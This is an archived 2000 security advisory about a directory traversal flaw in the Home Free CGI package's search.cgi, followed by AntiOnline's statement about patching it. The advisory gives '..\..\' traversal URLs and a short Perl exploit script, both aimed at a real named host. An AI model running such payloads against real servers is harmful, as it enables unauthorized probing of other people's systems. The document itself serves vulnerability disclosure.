Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: search~1.txt

SolutionScripts.com Home Free CGI package search.cgi allows remote users to view directory listings on the server.





[ http://www.rootshell.com/ ]

k0ad k1d <k0adk1d@hotmail.com>

==============================================================================

    #!/bin/csh security advisory
    ----------------------------

           Title  :  Vulnerabilities in the SolutionScripts.com
                     Home Free CGI package.

    Advisory Ref  :  csh-adv:04.01.2000-CGI-HomeFree-01

         Credits  :  fzx, omnihil, the guys in !el8
                     DSKZ, M0D

==============================================================================

Introduction
------------

SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that
support the language (WinNT, Linux, various Unix flavors). Home Free is a
package developed and marketed by SolutionScripts.com, below is an extract
from their website.


     "Home Free is the ultimate community building program. Allowing you
      to give your visitors a free web site on your server. With complete
      control over every aspect of your free web site program, you can
      grow page views, revenue and brand awareness for your site."

      http://solutionscripts.com/vault/homefree/index.shtml


Home Free is used by many popular websites. It allows users to set up and
maintain their websites through a series of CGI scripts without posing a
threat to system security.


Details
-------

Home Free consists of the following files from an end-user point of view :-

     ./features.cgi
     ./new.cgi
     ./search.cgi
     ./signup.cgi
     ./user_files.cgi
     ./user_formmail.cgi
     ./user_ftp_import.cgi
     ./user_gbook.cgi
     ./user_manage.cgi
     ./user_pref.cgi
     ./user_uploads.cgi
     ./user_wwwboard.cgi


There are also various 'admin' CGI scripts in the package, such as :-

     ./admin.cgi
     ./admin_browse.cgi
     ./admin_cata.cgi
     ./admin_email.cgi
     ./admin_features.cgi
     ./admin_setup.cgi
     ./admin_update.cgi



Vulnerabilities Identified
--------------------------

     ./search.cgi

     The search.cgi script uses the following input variables :-

       letter=any string
       cata=any string
       perpage=any string
       start=any string
       boolean=or/and
       advanced


     This CGI script can be exploited to view directory listings on the host
     server. A vulnerability exists because of insufficient bounds checking
     of the 'letter' variable when it is parsed by the search.cgi script,
     for example :-


http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt

     The above URL will list the \winnt directory of the host. The
search.cgi
     script also seems to read and display the first line of each file
     (network.wri, et al). We have been unable to use the search.cgi script
     or any of the other scripts in the package to view files to date.

     If we had access to the source code of these Perl scripts, I'm sure
that
     many security problems would be identified.

     You can also exploit the vulnerability to view other directory
listings,
     such as the /cgi-bin directory under Apache.


http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin


     We also took the time in writing a short Perl script to display the
     directory listings of vulnerable servers :

     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip

     #!/usr/bin/perl
     #
     # Quick exploit of the Home Free ./search.cgi script, allows you to
list
     # directories on the host.
     #
     # Default server is antionline's, change as appropriate.
     #

     use IO::Socket;

     if ($ARGV[0] eq "") { die "no argument\n"; }

     $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                   PeerAddr  => "members.antionline.com",
                                   PeerPort  => 80) ||
                     die "can't connect to host: $!";

     select($asoc);
     $| = 1;

     print $asoc "GET
/cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all
HTTP/1.0\n\n";

     while(<$asoc>) {
             if ($_ =~ /.+HREF.+TD.+/) {
                     @parts = split("\"", $_);
                     $foo = $parts[1];
                     @parts = split("/", $foo);
                     print STDOUT $parts[3];
                     print STDOUT "\n";
             }
     }
     close(ASOC);

     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip



  Other smaller problems were identified when testing the bounds checking
and
  flexibility of the other scripts, such as user_manage.cgi. Without access
to
  the source code of the Perl scripts in question, it is very difficult to
  know the security implications of such problems. We'll leave that up to
  the vendor to look into and patch.


==============================================================================

    #!/bin/csh security advisory
    ----------------------------

           Title  :  Vulnerabilities in the SolutionScripts.com
                     Home Free CGI package.

    Advisory Ref  :  csh-adv:01.04.2000-CGI-HomeFree-01

         Credits  :  fzx, omnihil, the guys in !el8
                     DSKZ, M0D

==============================================================================

http://www.antionline.com/cgi-bin/News?type=antionline&date=01-03-2000&story=AObug.news

AntiOnline Status Notice 
Tuesday, January 4, 2000 at 17:27:32
by John Vranesevich - Founder of AntiOnline 

As part of its policy on releasing any information related to the security of its network, AntiOnline presents the following
statement:

On Tuesday, the popular BugTraq security mail list released an advisory
about the security of "Home Free", a cgi software product produced by
SolutionScripts.com AntiOnline, along with hundreds of other websites, used
the HomeFree software in order to host free "user webpages" on its
members.antionline.com domain (which can be thought of as a geocities-like
interface). The security advisory used the AntiOnline instillation of
HomeFree as an example (we appreciate it) of the vulnerability.

The disclosed vulnerability allowed any user to view the structure of any
directory on the webserver. However, it did not allow any user to view the
contents of, delete, or otherwise modify any file on the server.

AntiOnline had the offending CGIs offline within 3 minutes of the BugTraq
notice being sent out (thanks to custom notification software implemented at
AntiOnline).

AntiOnline notified the makers of the HomeFree Software, and received a
patch from SolutionScript developer Tim Watson within 15 minutes. AntiOnline
is in the process of reviewing the patch, and the integrity of the other
CGIs in the HomeFree package.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH